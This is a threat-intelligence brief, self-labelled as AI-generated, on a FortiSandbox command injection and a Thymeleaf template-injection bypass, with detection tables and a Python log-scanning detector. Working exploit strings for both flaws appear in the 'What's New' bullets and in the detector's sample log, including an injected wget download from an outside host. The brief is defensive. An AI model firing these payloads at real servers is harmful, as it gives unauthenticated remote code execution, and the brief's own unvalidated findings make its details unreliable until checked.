Cyber Threat Brief — April 18 2026
⚠️ This report is AI-generated. Always validate findings.
1. FortiSandbox Unauthenticated Root RCE — CVE-2026-39808
TL;DR: Unauthenticated OS command injection in FortiSandbox’s /fortisandbox/job-detail/tracer-behavior endpoint gives root RCE with a single curl command. Public PoC on GitHub; CVSS 9.8.
What’s New:
- Exploit path: `GET /fortisandbox/job-detail/tracer-behavior?jid=|(cmd > /web/ng/out.txt)|` — the `jid` parameter is passed unsanitized to a shell command, yielding unauthenticated root-level code execution.
- Affected: FortiSandbox 4.4.0 through 4.4.8. Fixed in 4.4.9+. Advisory: FG-IR-26-100.
- PoC published by researcher samu-delucas on GitHub (April 16); Fortinet patch released same week.
- Companion vuln CVE-2026-39813 (auth bypass) also patched — chaining the two gives full pre-auth compromise of FortiSandbox appliances.
- Shodan/Censys show ~2,400 internet-facing FortiSandbox instances; mass scanning expected imminently.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| `GET /fortisandbox/job-detail/tracer-behavior` with shell metacharacters (`\|`, `;`, `&`, `$(`) in the `jid` param, URL-encoded or not | HTTP request | T1190 | WAF, reverse proxy, FortiSandbox access logs | Block/Alert |
| Outbound connections from FortiSandbox to unexpected hosts | Network | T1071.001 | Firewall, NDR, Zeek conn.log | Alert — post-exploitation C2 |
| New files in `/web/ng/` written by the web process | File write | T1059.004 | FortiSandbox local audit log, HIDS | Alert — webshell/output staging |
| Unexpected child processes of the FortiSandbox web service (`/bin/sh`, `bash`, `curl`, `wget`) | Process chain | T1059.004 | EDR (if agent deployed), FortiSandbox syslog | High-fidelity alert |
| FortiSandbox version < 4.4.9 exposed to the internet | Recon | T1190 | ASM scan, Shodan/Censys | Remediate — upgrade or restrict access |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No FortiSandbox-specific rule; write SPL for HTTP requests to tracer-behavior with shell metacharacters in jid |
| Elastic | None | No rule; custom KQL for FortiSandbox access logs with pipe/semicolon injection patterns |
| Sigma | None | Write web_fortisandbox_cmd_injection_cve_2026_39808.yml matching GET to /job-detail/tracer-behavior with shell metacharacters |
Sources: CybersecurityNews PoC Report · Help Net Security · The Register · Fortinet Advisory FG-IR-26-100
2. Thymeleaf SSTI Sandbox Bypass — CVE-2026-40478
TL;DR: Whitespace parsing gap + incomplete type blocklist in Thymeleaf ≤ 3.1.3 lets attackers bypass expression sandbox for full RCE on any Spring/Java app using Thymeleaf templates with user-controlled input. CVSS 9.1; PoC public.
What’s New:
- Root cause: a single tab character between `New` and a class name bypasses the case-sensitive keyword blocklist; the type blocklist only covered `java.*` packages, missing Spring framework classes entirely.
- Exploit payloads: `__${T(java.lang.Runtime).getRuntime().exec('cmd')}__` (basic) and the bypass variant `__|$${New\tjava.util.Scanner(New\tProcessBuilder('cmd','/c','whoami').start().getInputStream()).next()}|__::.x`, which uses `$${` instead of `${`.
- Affects all Thymeleaf ≤ 3.1.3.RELEASE (thymeleaf, thymeleaf-spring5, thymeleaf-spring6). Fixed in 3.1.4.RELEASE.
- No authentication required if user input reaches the template engine — common in Spring MVC apps where `@RequestParam` values are injected into view names or template fragments.
- Endor Labs published a detailed root-cause analysis; multiple PoCs are circulating on GitHub.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| HTTP params containing `__${`, `$${`, `T(java.lang.Runtime)`, `ProcessBuilder` | HTTP request | T1190 | WAF, reverse proxy, web access logs | Block/Alert |
| HTTP params with `__\|` or `\|__` delimiters combined with SpEL expressions | HTTP request | T1190 | WAF, reverse proxy, web access logs | Block/Alert |
| Java process spawning unexpected child processes (`cmd.exe`, `/bin/sh`, `bash`) after a web request | Process chain | T1059 | Sysmon EID 1, EDR, auditd | High-fidelity alert |
| thymeleaf dependency version ≤ 3.1.3 in pom.xml / build.gradle | Software inventory | T1190 | SCA tools, SBOM | Remediate — upgrade to 3.1.4+ |
| Outbound connections from the Java web app to unexpected hosts post-exploitation | Network | T1071.001 | Firewall, NDR | Alert — post-exploitation indicator |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No Thymeleaf SSTI rule; write SPL for WAF/proxy logs matching __\$\{ or T(java in request parameters |
| Elastic | None | No rule; custom KQL for web logs with SpEL expression patterns (T(java, ProcessBuilder, Runtime.exec) |
| Sigma | web_java_ssti_generic.yml (partial) | Generic SSTI rule may catch basic payloads; misses $${ and tab-based bypasses — extend with CVE-2026-40478 bypass patterns |
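Both Detection tables in this brief (the FortiSandbox one in section 1 and the Thymeleaf one above) record no vendor rule and ask for custom logic: shell metacharacters in `jid` on the tracer-behavior endpoint, and `__${` / `$${` / tab-based `New` payloads in request parameters. The following Python is an added example of that logic run over access-log lines; it is not code from Fortinet, Thymeleaf, Endor Labs or the PoC author. The log lines, source IPs, the `/search?q=` parameter and the `id`/`wget` commands in them are constructed for illustration, and the detector assumes the proxy or WAF records the full request target including the query string.

```python
"""Request-level detection for CVE-2026-39808 and CVE-2026-40478.

Added example, not code from Fortinet, Thymeleaf, Endor Labs or the PoC authors.
The log lines below are constructed (Common Log Format) for illustration only.
"""
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Constructed sample: benign traffic, two FortiSandbox jid injections, the basic
# Thymeleaf payload and the tab/$${ bypass variant quoted in the brief.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Apr/2026:10:01:02 +0000] "GET /fortisandbox/job-detail/tracer-behavior?jid=12345 HTTP/1.1" 200 512
203.0.113.9 - - [18/Apr/2026:10:01:07 +0000] "GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%20%3E%20/web/ng/out.txt)%7C HTTP/1.1" 200 17
203.0.113.9 - - [18/Apr/2026:10:01:09 +0000] "GET /fortisandbox/job-detail/tracer-behavior?jid=1%3Bwget%20http://203.0.113.9/x HTTP/1.1" 200 17
198.51.100.4 - - [18/Apr/2026:10:02:00 +0000] "GET /search?q=__%24%7BT(java.lang.Runtime).getRuntime().exec('id')%7D__ HTTP/1.1" 500 0
198.51.100.4 - - [18/Apr/2026:10:02:03 +0000] "GET /search?q=__%7C%24%24%7BNew%09java.util.Scanner(New%09ProcessBuilder('id').start().getInputStream()).next()%7D%7C__%3A%3A.x HTTP/1.1" 500 0
10.0.0.7 - - [18/Apr/2026:10:03:00 +0000] "GET /search?q=thymeleaf+templates HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
FSA_PATH = "/fortisandbox/job-detail/tracer-behavior"
# Characters that end or chain a command once jid is interpolated into a shell line.
SHELL_META = re.compile(r"[|;&`$()<>\n]")
# Thymeleaf preprocessing delimiters (__${ }__, __| |__), the $${ variant, and the SpEL
# type-reference / process-spawn fragments from the published payloads.
SSTI_MARKERS = re.compile(r"__\$\{|\$\$\{|__\||\|__|T\(java|ProcessBuilder|getRuntime\(\)|\.exec\(", re.IGNORECASE)
# Bypass shape: 'new', any whitespace (a tab in the PoC), a class name, '('. Matched
# case-insensitively because the vulnerable keyword blocklist was case-sensitive.
NEW_BYPASS = re.compile(r"\bnew\s+[A-Za-z_][\w.]*\s*\(", re.IGNORECASE)


def parse_query(query):
    """Split on '&' only so a literal ';' stays inside the value, and decode twice so a
    double-encoded payload is inspected in the form the application would finally see."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote(unquote_plus(value)))
    return params


def parse_line(line):
    """One CLF line -> dict with src, path and params, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"], rec["params"] = parts.path, parse_query(parts.query)
    return rec


def check_fortisandbox(rec):
    """CVE-2026-39808: any shell metacharacter in jid on the tracer-behavior endpoint."""
    if rec["path"] != FSA_PATH:
        return None
    for jid in rec["params"].get("jid", []):
        if SHELL_META.search(jid):
            return ("CVE-2026-39808", "jid", jid)
    return None


def check_thymeleaf(rec):
    """CVE-2026-40478: expression markers or the new-with-whitespace bypass in any
    parameter. The bypass shape only counts inside an expression ('{' present) so that
    ordinary text such as 'new york (nyt)' does not fire."""
    for name, values in rec["params"].items():
        for value in values:
            if SSTI_MARKERS.search(value) or ("{" in value and NEW_BYPASS.search(value)):
                return ("CVE-2026-40478", name, value)
    return None


def scan(log_text):
    """Run both checks over every parseable line; at most one hit per line."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for check in (check_fortisandbox, check_thymeleaf):
            hit = check(rec)
            if hit:
                hits.append((rec["src"], rec["path"]) + hit)
                break
    return hits


if __name__ == "__main__":
    for src, path, cve, param, value in scan(SAMPLE_LOG):
        print(f"{cve} {src} {path} {param}={value!r}")
```

Run against the constructed sample it reports the two `jid` injections and both Thymeleaf payloads and stays quiet on the benign lines. The two normalisation choices are the part worth carrying into the SPL, KQL or Sigma rules the tables ask for: decoding before matching is what makes the `$${` and `%09`-tab forms visible at all, and splitting the query on `&` only keeps a literal `;` inside the value being inspected instead of turning it into a second parameter.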
Sources: Endor Labs Analysis · CSO Online · GitLab Advisory · GitHub Advisory GHSA-xjw8-8c5c-9r79
Status Updates
- CVE-2026-33825 / RedSun / UnDefend (Microsoft Defender): No new developments since yesterday; RedSun and UnDefend remain unpatched. Continue monitoring for Microsoft out-of-band fix. Original brief.
- CVE-2026-34197 (Apache ActiveMQ Jolokia RCE): CISA KEV deadline May 6; no new ITW activity reported. Verify patching to 5.19.4 / 6.2.3. Original brief.
- CVE-2026-32201 (SharePoint Spoofing): Patch Tuesday fix available; verify deployment across SharePoint farms. Original brief.